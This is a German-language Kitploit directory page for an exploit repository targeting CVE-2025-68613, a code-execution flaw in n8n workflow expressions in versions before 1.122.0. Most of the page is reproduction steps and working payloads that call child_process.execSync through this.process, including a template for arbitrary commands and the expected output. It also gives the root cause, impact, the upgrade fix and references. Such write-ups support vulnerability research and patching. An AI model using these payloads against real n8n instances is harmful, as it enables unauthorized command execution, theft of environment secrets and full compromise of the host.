Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613: n8n RCE-Schwachstellen-Exploit und Dokumentation | Kitploit
Tools/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613: n8n RCE-Schwachstellen-Exploit und Dokumentation

Repository anzeigen
106222vor 8 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

n8n - CVE-2025-68613: Unzureichende Kontrolle dynamisch verwalteter Code-Ressourcen

Schwachstelle

n8n enthält eine kritische Schwachstelle zur Ausführung von beliebigem Code (Arbitrary Code Execution) im Ausdrucksauswertungssystem von Workflows. Unter bestimmten Bedingungen können Ausdrücke, die von authentifizierten Benutzern während der Workflow-Konfiguration bereitgestellt werden, in einem Ausführungskontext ausgewertet werden, der nicht ausreichend von der zugrunde liegenden Laufzeitumgebung isoliert ist.

Betroffene Versionen

  • Verwundbar: n8n < v1.122.0
  • Behoben: n8n >= v1.122.0

Voraussetzungen

  • Authentifizierter Zugriff auf die n8n-Instanz
  • Möglichkeit, Workflows zu erstellen/bearbeiten

Schritte zur Reproduktion

1. Neuen Workflow erstellen

  • Klicken Sie auf „Add workflow"

2. Knoten hinzufügen

  • Fügen Sie den Knoten „Manual Trigger" hinzu
  • Fügen Sie den Knoten „Set" hinzu (mit dem Trigger verbunden)

3. Payload konfigurieren

  • Klicken Sie auf den Knoten „Set"
  • Klicken Sie auf „Add Value" → Wählen Sie „String"
  • Benennen Sie das Feld „result"
  • Klicken Sie auf das Symbol „=", um den Ausdrucksmodus zu aktivieren

4. Payload einfügen

Fügen Sie diesen Payload in das Ausdrucksfeld ein:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. Ausführen

  • Klicken Sie auf „Execute step"
  • Prüfen Sie die Ausgabe des Knotens „Set" auf das Befehlsergebnis

Demonstration des Exploits für CVE-2025-68613

Payload-Beispiele

ID-Befehl:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

PWD-Befehl:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

Vorlage für benutzerdefinierte Befehle:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

Erwartete Ausgabe

Für den id-Befehl:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

Für den pwd-Befehl:

root@kitploit:~
/app

Grundursache

Dem Ausdrucksbewerter fehlt ein Sanitizer, der Funktionsausdrücke am Zugriff auf this.process (das Node.js-Prozessobjekt) hindert, wodurch Zugriff auf Systemmodule möglich ist.

Auswirkungen

  • Ausführung beliebiger Befehle
  • Zugriff auf das Dateisystem
  • Offenlegung von Umgebungsvariablen
  • Vollständige Systemkompromittierung

Gegenmaßnahmen

Upgrade auf n8n v1.122.0 oder höher durchführen.

Referenzen

  • Fix: https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • Repository: https://github.com/n8n-io/n8n
  • Blogbeitrag: https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

Haftungsausschluss: Diese Informationen dienen ausschließlich Sandbox- und Bildungszwecken. Die nicht autorisierte Nutzung dieser Informationen zur Ausnutzung von Systemen ist illegal und unethisch. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Schwachstellen testen oder ausnutzen.

Tool herunterladen